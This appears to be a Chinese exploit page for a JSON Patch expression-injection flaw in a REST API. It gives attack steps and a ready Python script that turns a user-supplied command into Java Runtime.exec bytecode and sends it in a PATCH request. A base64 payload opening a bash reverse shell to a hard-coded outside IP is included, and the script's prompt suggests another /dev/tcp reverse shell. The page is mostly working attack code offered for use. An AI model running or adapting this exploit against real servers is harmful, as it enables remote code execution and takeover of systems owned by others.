漏洞原理分析

https://zhuanlan.zhihu.com/p/166373950

打法

'''
首先访问/api/people POST提交JSON数据{"firstName":"w3","lastName":"lkin"}来创建一个用户
接着访问返回地址改为PATCH请求   content-type改为application/json-patch+json
exp
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{生成的数字}))/lastname", "value": "whatever" }]
'''
payload = b'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjE3Ni4zOS80NDQ0NCAwPiYx}|{base64,-d}|{bash,-i}'
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)

exp

import urllib.parse
import requests
import re
import base64

print('''
             ████   ██ ██     ██         
            █░░░ █ ░██░██    ░░          
 ███     ██░    ░█ ░██░██  ██ ██ ███████ 
░░██  █ ░██   ███  ░██░██ ██ ░██░░██░░░██
 ░██ ███░██  ░░░ █ ░██░████  ░██ ░██  ░██
 ░████░████ █   ░█ ░██░██░██ ░██ ░██  ░██
 ███░ ░░░██░ ████  ███░██░░██░██ ███  ░██
░░░    ░░░  ░░░░  ░░░ ░░  ░░ ░░ ░░░   ░░      2023.4.11

''')
url = input("请输入URL:")

parsed_url = urllib.parse.urlparse(url)
protocol = parsed_url.scheme
host = parsed_url.hostname
path = parsed_url.path
query_params = urllib.parse.parse_qs(parsed_url.query)
host=f"{protocol}://{host}"
exp1=host+"/api/people"
data1='{"firstName":"w3","lastName":"lkin"}'
resp1=requests.post(url=exp1,data=data1)
match1 = re.search(r'"href" : "(?P<mes>.*?)"', resp1.text)

if match1:
    host1=match1.group("mes")
    headers={
        "content-type":"application/json-patch+json"
    }
    exps=input("请输入要执行的命令 如(bash -i >& /dev/tcp/1.1.1.1/44444 0>&1):")
    encoded_string = base64.b64encode(exps.encode("utf-8"))
    payload = b'bash -c {echo,%s}|{base64,-d}|{bash,-i}'%(encoded_string)
    bytecode = ','.join(str(i) for i in list(payload))
    exp2='[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{%s}))/lastname", "value": "whatever" }]'%(bytecode)
    resp=requests.patch(url=host1,headers=headers,data=exp2)
    print(resp.text)
else:
    print("没有匹配到结果!")